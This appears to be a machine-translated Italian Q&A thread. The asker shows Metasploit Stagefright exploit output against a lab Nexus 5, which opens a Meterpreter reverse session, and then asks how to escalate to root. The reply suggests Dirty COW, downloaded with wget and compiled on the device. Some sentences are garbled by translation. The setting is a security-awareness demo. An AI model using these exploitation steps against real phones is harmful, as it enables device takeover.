SELinux Privilege Escalation Metasploit Nexus 5 Android 5.0.1 LRX22C dopo Stagefright

3

Sto preparando una parte di un giorno della sensibilizzazione alla sicurezza e una parte dello "spettacolo" dovrebbe riguardare la sicurezza mobile. Ho pensato di mostrare lo exploit stagefright .

Così ho iniziato a far funzionare un telefono cellulare supportato dall'ultimo modulo stagefright nel metasploit-framework (Nexus 5), convertendolo in una versione con vulnerabilità stagefright (Android 5.0.1 LRX22C) e iniziando a sfruttare.

Tutto funziona bene:

[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Target selected: Nexus 5 (hammerhead) with Android 5.0.1 (LRX22C)<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending HTML to 192.168.1.108:56616...<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending infoleak gzip'd MPEG4 (742 bytes) to 192.168.1.108:56616... (heap: 0x0, code: 0x0 from Browser)<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Target selected: Nexus 5 (hammerhead) with Android 5.0.1 (LRX22C)<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending HTML to 192.168.1.108:56616...<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending infoleak gzip'd MPEG4 (742 bytes) to 192.168.1.108:56616... (heap: 0xb3a2e980, code: 0x0 from Browser)<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending RCE gzip'd MPEG4 (102053 bytes) to 192.168.1.108:56616... (heap: 0xb3a2e980, code: 0xb64f1cb0 from Browser)<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending RCE gzip'd MPEG4 (102048 bytes) to 192.168.1.108:58971... (heap: 0xb3a2e980, code: 0xb64f1cb0 from SF)<br/>
[*] Transmitting intermediate stager...(136 bytes)<br/>
[*] Sending stage (397164 bytes) to 192.168.1.108<br/>
[*] Meterpreter session 1 opened (192.168.1.106:4444 -> 192.168.1.108:44680) at 2017-02-19 05:19:51 -0500<br/>

In questa sessione, sono un grande aiuto e senza ragione. Il mio UID è 1013 - che presumo sia l'UID del mediaserver. Non ho accesso a directory o file interessanti (nessun accesso - nessun effetto con il mio show). Impressionato, ho notato che questo telefono utilizza SELinux. Ho deciso di chiedere a Google come ottenere più privilegi e ho trovato questo: Modulo Metasploit CVE-2015-3864 di Mr. Drake aka jduck.

Ha usato un temperamento appositamente predisposto per ottenere l'accesso come root all'interno di questo ambiente SELinux. Ma devo ammettere che questo è qualcosa di cui avrei bisogno di un consiglio / aiuto. Come faccio a creare tali carichi utili uniti con coraggio, pingpong e iovyroot?
Breve: Come ottengo più privilegi o forse anche root su questo telefono per mostrare qualcosa che tocca il pubblico?

Domanda più precisa:
Come posso personalizzare il carico utile di tipo tangle per includere gli exploit PingPong-root e Iovy-root?
(Qualsiasi altra personalizzazione dei payload per ottenere l'accesso root è ben accetta;))

    
posta Agent H. 19.02.2017 - 11:54
fonte

1 risposta

2

Utilizza la vulnerabilità del kernel Dirtycow . Credo che con il downgrade che hai fatto, il kernel sia vulnerabile ad esso.

Puoi usarlo anche sui kernel Android: PoC Android sporchi .

Un esempio video su questo: link

Una volta entrato nel dispositivo, puoi scaricare tramite wget o comunque l'exploit e compilarlo per ottenere il root. Controlla il tuo kernel per vedere se è vulnerabile, immagino lo sia.

    
risposta data 19.02.2017 - 13:51
fonte